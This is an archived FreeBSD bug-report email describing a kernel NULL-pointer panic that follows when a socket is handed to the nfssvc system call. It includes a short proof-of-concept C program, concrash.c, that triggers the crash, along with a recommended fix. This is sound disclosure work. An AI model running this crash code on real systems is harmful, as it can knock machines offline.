From owner-freebsd-bugs@freebsd.org Wed Mar 1 20:52:41 2017 Return-Path: Delivered-To: freebsd-bugs@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 54F0ECF30DE for ; Wed, 1 Mar 2017 20:52:41 +0000 (UTC) (envelope-from bugzilla-noreply@freebsd.org) Received: from kenobi.freebsd.org (kenobi.freebsd.org [IPv6:2001:1900:2254:206a::16:76]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 2C84182 for ; Wed, 1 Mar 2017 20:52:41 +0000 (UTC) (envelope-from bugzilla-noreply@freebsd.org) Received: from bugs.freebsd.org ([127.0.1.118]) by kenobi.freebsd.org (8.15.2/8.15.2) with ESMTP id v21KqfNY050714 for ; Wed, 1 Mar 2017 20:52:41 GMT (envelope-from bugzilla-noreply@freebsd.org) From: bugzilla-noreply@freebsd.org To: freebsd-bugs@FreeBSD.org Subject: [Bug 217463] socket calls can cause panic after passing socket to nfssvc Date: Wed, 01 Mar 2017 20:52:41 +0000 X-Bugzilla-Reason: AssignedTo X-Bugzilla-Type: new X-Bugzilla-Watch-Reason: None X-Bugzilla-Product: Base System X-Bugzilla-Component: kern X-Bugzilla-Version: 10.3-RELEASE X-Bugzilla-Keywords: X-Bugzilla-Severity: Affects Some People X-Bugzilla-Who: tim.newsham@nccgroup.trust X-Bugzilla-Status: New X-Bugzilla-Resolution: X-Bugzilla-Priority: --- X-Bugzilla-Assigned-To: freebsd-bugs@FreeBSD.org X-Bugzilla-Flags: X-Bugzilla-Changed-Fields: bug_id short_desc product version rep_platform op_sys bug_status bug_severity priority component assigned_to reporter Message-ID: Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: quoted-printable X-Bugzilla-URL: https://bugs.freebsd.org/bugzilla/ Auto-Submitted: auto-generated MIME-Version: 1.0 X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.23 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 01 Mar 2017 20:52:41 -0000 https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=3D217463 Bug ID: 217463 Summary: socket calls can cause panic after passing socket to nfssvc Product: Base System Version: 10.3-RELEASE Hardware: Any OS: Any Status: New Severity: Affects Some People Priority: --- Component: kern Assignee: freebsd-bugs@FreeBSD.org Reporter: tim.newsham@nccgroup.trust /* * concrash.c * Cause a panic using nfssvc system call after it receives a socket Description: When you pass a socket to the NFS subsystem in the kernel, it uses nfscbd_addsock() to claim the socket. This results in the fp->f_data being set to zero. If this socket is later used in "normal" socket system calls that access f_data, a NULL pointer dereference will result in a kernel panic. This is triggerable through many system calls such as getsockopt, setsockopt, connect, listen, bind, send, recv and nfssvc itself. This is of low risk since it requires access to privileged operations in the nfssvc system call. Recommendation: Consider updating getsock_cap to return an error if f_type is DTYPE_SOCKET but f_data is NULL. This indicates that the socket has been stolen by the kernel. Update all socket operations that access f_data to first check if f_data is NULL and return an error in this case. */ #include #include #include #include #include #include #include #include #include #include #include #include #include int main(int argc, char **argv) { struct nfscbd_args args; char buf[8] =3D {0}; int fd, x; fd =3D socket(AF_INET6, SOCK_STREAM, 0); if(fd =3D=3D -1) exit(1); printf("fd %d\n", fd); // give it over to the kernel args.sock =3D fd; x =3D nfssvc(NFSSVC_CBADDSOCK, &args); printf("nfssvc %d\n", x); x =3D connect(fd, (struct sockaddr *)buf, 5); printf("res %d\n", x); return 0; } --=20 You are receiving this mail because: You are the assignee for the bug.=